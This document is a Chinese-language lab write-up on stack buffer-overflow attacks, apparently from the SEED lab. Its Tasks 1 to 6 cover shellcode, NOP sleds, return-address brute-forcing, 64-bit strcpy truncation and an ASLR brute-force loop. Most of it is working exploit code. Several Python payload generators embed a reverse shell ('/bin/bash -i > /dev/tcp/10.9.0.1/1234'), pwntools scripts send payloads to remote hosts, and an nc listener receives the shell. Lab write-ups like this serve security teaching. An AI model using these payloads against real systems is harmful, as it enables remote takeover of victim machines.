Task 1#

shellcode_32/64两个文件将shellcode转为字节写入在codefile_32/64中，之后运行call_shellcode.c程序，将其转成可执行的二进制文件call_shellcode.c中的关键代码为：

含义是将shellcode的字节形式读入缓存区code中，定义一个函数指针指向了这片内存缓存区，即将这片缓存区的内容当作函数去执行，达到了执行shellcode的目的。

修改原始代码，作用为删除test文件：

32位

1
#!/usr/bin/python3
2
import sys
3

4
# You can use this shellcode to run any command you want
5
shellcode = (
6
   "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
7
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
8
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
9
   "/bin/bash*"
10
   "-c*"
11
   # You can modify the following command string to run any command.
12
   # You can even run multiple commands. When you change the string,
13
   # make sure that the position of the * at the end doesn't change.
14
   # The code above will change the byte at this position to zero,
15
   # so the command string ends here.
16
   # You can delete/add spaces, if needed, to keep the position the same.
17
   # The * in this line serves as the position marker         *
18
   #"/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd     *"
19
   "/bin/rm test1.txt                                           "
20
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
21
   "BBBB"   # Placeholder for argv[1] --> "-c"
22
   "CCCC"   # Placeholder for argv[2] --> the command string
23
   "DDDD"   # Placeholder for argv[3] --> NULL
24
).encode('latin-1')
25

26
content = bytearray(200)
27
content[0:] = shellcode
28

29
# Save the binary code to file
30
with open('codefile_32', 'wb') as f:
31
  f.write(content)

64位

1
#!/usr/bin/python3
2
import sys
3

4
# You can use this shellcode to run any command you want
5
shellcode = (
6
   "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
7
   "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
8
   "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
9
   "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
10
   "/bin/bash*"
11
   "-c*"
12
   # You can modify the following command string to run any command.
13
   # You can even run multiple commands. When you change the string,
14
   # make sure that the position of the * at the end doesn't change.
15
   # The code above will change the byte at this position to zero,
16
   # so the command string ends here.
17
   # You can delete/add spaces, if needed, to keep the position the same.
18
   # The * in this line serves as the position marker         *
19
   #"/bin/ls -l; echo Hello 64; /bin/tail -n 4 /etc/passwd     *"
20
   "/bin/rm test2.txt                                           "
21
   "AAAAAAAA"   # Placeholder for argv[0] --> "/bin/bash"
22
   "BBBBBBBB"   # Placeholder for argv[1] --> "-c"
23
   "CCCCCCCC"   # Placeholder for argv[2] --> the command string
24
   "DDDDDDDD"   # Placeholder for argv[3] --> NULL
25
).encode('latin-1')
26

27
content = bytearray(200)
28
content[0:] = shellcode
29

30
# Save the binary code to file
31
with open('codefile_64', 'wb') as f:
32
  f.write(content)

成功删除

Task2#

攻击方法：在整个517字节的buf最后一部分放入shellcode，在函数栈帧的返回地址处放入shellcode的地址，填充NOP指令，程序会不断向上执行空转，直到执行到shellcode，这种技巧俗称NOP滑梯。

攻击代码：

1
#!/usr/bin/python3
2
import sys
3

4
shellcode= (
5
  "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
6
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
7
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
8
   "/bin/bash*"
9
   "-c*"
10
   # You can modify the following command string to run any command.
11
   # You can even run multiple commands. When you change the string,
12
   # make sure that the position of the * at the end doesn't change.
13
   # The code above will change the byte at this position to zero,
14
   # so the command string ends here.
15
   # You can delete/add spaces, if needed, to keep the position the same.
16
   # The * in this line serves as the position marker         *
17
   #"/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd     *"
18
   "/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1            "
19
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
20
   "BBBB"   # Placeholder for argv[1] --> "-c"
21
   "CCCC"   # Placeholder for argv[2] --> the command string
22
   "DDDD"   # Placeholder for argv[3] --> NULL
23
).encode('latin-1')
24

25
# Fill the content with NOP's
26
content = bytearray(0x90 for i in range(517))
27

28
##################################################################
29
# Put the shellcode somewhere in the payload
30
start = 517 - len(shellcode)               # Change this number
31
content[start:start + len(shellcode)] = shellcode
32

33
# Decide the return address value
34
# and put it somewhere in the payload
35
ret    = 0xffffd0b8 + 8     # Change this number
36
offset = 116              # Change this number
37

38
# Use 4 for 32-bit address and 8 for 64-bit address
39
content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
40
##################################################################
41

42
# Write the content to a file
43
with open('badfile', 'wb') as f:
44
  f.write(content)

效果：

其中shellcode中的命令：

1
/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1

含义是启动交互式shell，将输出重定向到/dev/tcp/10.9.0.1/1234文件中，将标准输入和标准错误重定向到标准输出的同一个位置。该命令会主动连接到攻击者控制的服务器（10.9.0.1的1234端口），然后将当前shell的标准输入、标准输出和标准错误全部通过这个TCP连接传输，从而让攻击者能够远程控制受害主机。

执行并使用nc监听，即可成功连接：

1
nc -lvnp 1234

offset=116，原因是0xb8-0x48 = 112, 112 + 4 = 116，因为ebp本身是4个字节，所以需要加4。

最终payload结构：…NOP1 + NOP2 + 修改返回地址到NOP3 + NOP3 + NOP4… + shellcode

由于该Task限制较少，所以可以借助NOP滑梯，将shellcode放在buf的任何位置，只要可以正确修改返回地址到shellcode即可

pwntools版本：

1
#!/usr/bin/env python3
2
from pwn import *
3
context(arch='i386', os='linux')
4
p = remote('10.9.0.5',9090)
5
shellcode = asm(shellcraft.sh())
6
offset = 116
7
ret = 0xffffd568 + 8
8
payload = b'a' * offset + p32(ret) + shellcode + b'a' * (517 - len(shellcode) - 116 - 4)
9
p.send(payload)
10
p.interactive()

Task3#

2号服务器没有透露ebp的地址，也就无法精确知道应该在多少offset的位置填入shellcode返回地址，所以我们可以在shellcode前尽可能多的填入NOP滑梯的返回地址，进而使程序执行到shellcode。由于该实验的缓冲区大小为[100，200]，同时str占517字节，所以我们可以选择在0-300的范围内全部填入返回地址，那么几乎肯定可以覆盖到函数返回地址了。

攻击代码：

1
#!/usr/bin/python3
2
import sys
3

4
shellcode= (
5
  "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
6
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
7
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
8
   "/bin/bash*"
9
   "-c*"
10
   # You can modify the following command string to run any command.
11
   # You can even run multiple commands. When you change the string,
12
   # make sure that the position of the * at the end doesn't change.
13
   # The code above will change the byte at this position to zero,
14
   # so the command string ends here.
15
   # You can delete/add spaces, if needed, to keep the position the same.
16
   # The * in this line serves as the position marker         *
17
   #"/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd     *"
18
   "/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1            "
19
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
20
   "BBBB"   # Placeholder for argv[1] --> "-c"
21
   "CCCC"   # Placeholder for argv[2] --> the command string
22
   "DDDD"   # Placeholder for argv[3] --> NULL
23
).encode('latin-1')
24

25
# Fill the content with NOP's
26
content = bytearray(0x90 for i in range(517))
27

28
##################################################################
29
# Put the shellcode somewhere in the payload
30
start = 517 - len(shellcode)               # Change this number
31
content[start:start + len(shellcode)] = shellcode
32

33
# Decide the return address value
34
# and put it somewhere in the payload
35
ret    = 0xffffcff8 + 304     # Change this number
36
#offset = 116              # Change this number
37

38
# Use 4 for 32-bit address and 8 for 64-bit address
39
for offset in range(0,300,4):
40
    content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
41
##################################################################
42

43
# Write the content to a file
44
with open('badfile', 'wb') as f:
45
  f.write(content)

结果：

在填入函数返回地址时，要注意内存对齐，即0xcff8 + 304 = 106784，该数值可以被4整除。（64位系统下需要满足可以被8整除）

payload结构 = NOP1地址 + NOP1地址 + … + NOP1地址 + NOP1 + NOP2 + … + shellcode

pwntools版本

1
#!/usr/bin/env python3
2
from pwn import *
3
context(arch='i386', os='linux')
4
p = remote('10.9.0.6',9090)
5
shellcode = asm(shellcraft.sh())
6
offset = 116
7
ret = 0xffffd4a8 + 304
8
payload = p32(ret) * 76 + shellcode + b'a' * (517 - len(shellcode) - 304)
9
p.send(payload)
10
p.interactive()

Task 4#

strcpy()函数遇到\0会停止复制，内存地址中的0会使strcpy()函数停止复制，发生截断，所以将构造的返回地址放在整个构造的buf的最后面，shellcode部分放在buf的最前面，即可解决截断问题

攻击代码：

1
#!/usr/bin/python3
2
import sys
3

4
shellcode= (
5
  "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
6
   "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
7
   "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
8
   "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
9
   "/bin/bash*"
10
   "-c*"
11
   # You can modify the following command string to run any command.
12
   # You can even run multiple commands. When you change the string,
13
   # make sure that the position of the * at the end doesn't change.
14
   # The code above will change the byte at this position to zero,
15
   # so the command string ends here.
16
   # You can delete/add spaces, if needed, to keep the position the same.
17
   # The * in this line serves as the position marker         *
18
   #"/bin/ls -l; echo Hello 64; /bin/tail -n 4 /etc/passwd     *"
19
   "/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1            "
20
   "AAAAAAAA"   # Placeholder for argv[0] --> "/bin/bash"
21
   "BBBBBBBB"   # Placeholder for argv[1] --> "-c"
22
   "CCCCCCCC"   # Placeholder for argv[2] --> the command string
23
   "DDDDDDDD"   # Placeholder for argv[3] --> NULL
24
).encode('latin-1')
25

26
# Fill the content with NOP's
27
content = bytearray(0x90 for i in range(517))
28

29
##################################################################
30
# Put the shellcode somewhere in the payload
31
start = 0              # Change this number
32
content[start:start + len(shellcode)] = shellcode
33

34
# Decide the return address value
35
# and put it somewhere in the payload
36
ret    = 0x00007fffffffe3c0     # Change this number
37
offset = 216              # Change this number
38

39
# Use 4 for 32-bit address and 8 for 64-bit address
40
content[offset:offset + 8] = (ret).to_bytes(8,byteorder='little')
41
##################################################################
42

43
# Write the content to a file
44
with open('badfile', 'wb') as f:
45
  f.write(content)

其中，ret的值等于buf的起始地址，offset等于偏移量+8（8 = rbp本身的长度）

效果：

Task5#

由输出结果可知，该程序中缓冲区长度很短：有96字节，但源程序提供的shellcode超过了这个长度

注：pwntools生成的shellcode长度比较短，上述缓冲区大小其实是足够使用的

虽然buf函数的栈帧无法放下shellcode，但我们输入的shellcode原始版本是是在dummy_function()中的，所以我们可以通过gdb调试，找出两个栈帧之间的偏移量，让程序流直接跳转到dummy_function()中的shellcode中即可。

以下使用pwndbg调试

此时可以看到dummy函数中输入的shellcode位于d460处，bof函数的rbp指向cfc0，可以计算出d460-cfc0=1184，故应覆盖的返回地址=rbp + 1184

payload结构 = （96+8）个NOP + shellcode地址 + shellcode + 剩余剩余NOP.

攻击代码：

1
#!/usr/bin/python3
2
import sys
3

4
shellcode= (
5
  "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
6
   "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
7
   "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
8
   "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
9
   "/bin/bash*"
10
   "-c*"
11
   # You can modify the following command string to run any command.
12
   # You can even run multiple commands. When you change the string,
13
   # make sure that the position of the * at the end doesn't change.
14
   # The code above will change the byte at this position to zero,
15
   # so the command string ends here.
16
   # You can delete/add spaces, if needed, to keep the position the same.
17
   # The * in this line serves as the position marker         *
18
   #"/bin/ls -l; echo Hello 64; /bin/tail -n 4 /etc/passwd     *"
19
   "/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1            "
20
   "AAAAAAAA"   # Placeholder for argv[0] --> "/bin/bash"
21
   "BBBBBBBB"   # Placeholder for argv[1] --> "-c"
22
   "CCCCCCCC"   # Placeholder for argv[2] --> the command string
23
   "DDDDDDDD"   # Placeholder for argv[3] --> NULL
24
).encode('latin-1')
25

26
# Fill the content with NOP's
27
content = bytearray(0x90 for i in range(517))
28

29
##################################################################
30
# Put the shellcode somewhere in the payload
31
start = 112              # Change this number
32
content[start:start + len(shellcode)] = shellcode
33

34
# Decide the return address value
35
# and put it somewhere in the payload
36
ret    = 0x00007fffffffe490 + 1184    # Change this number
37
offset = 104              # Change this number
38

39
# Use 4 for 32-bit address and 8 for 64-bit address
40
content[offset:offset + 8] = (ret).to_bytes(8,byteorder='little')
41
##################################################################
42

43
# Write the content to a file
44
with open('badfile', 'wb') as f:
45
  f.write(content)

其中，start的值 = 96 + 8 + 8，即填充返回地址的下一个地址。offset = 96+8，即要覆盖的返回地址的偏移

结果：

Task6#

(ASLR)地址空间随机化是针对缓冲区溢出攻击的防御措施之一，目的是让攻击者难以猜测到所注入的恶意代码在内存中的具体位置

设置地址随机化：

1
sudo /sbin/sysctl -w kernel.randomize_va_space=2

可以看到地址随机变化

针对服务器一，运行以下脚本：

1
#!/bin/bash
2
SECONDS=0
3
value=0
4
while true; do
5
value=$(( $value + 1 ))
6
duration=$SECONDS
7
min=$(($duration / 60))
8
sec=$(($duration % 60))
9
echo "$min minutes and $sec seconds elapsed."
10
echo "The program has been running $value times so far."
11
cat badfile | nc 10.9.0.5 9090
12
done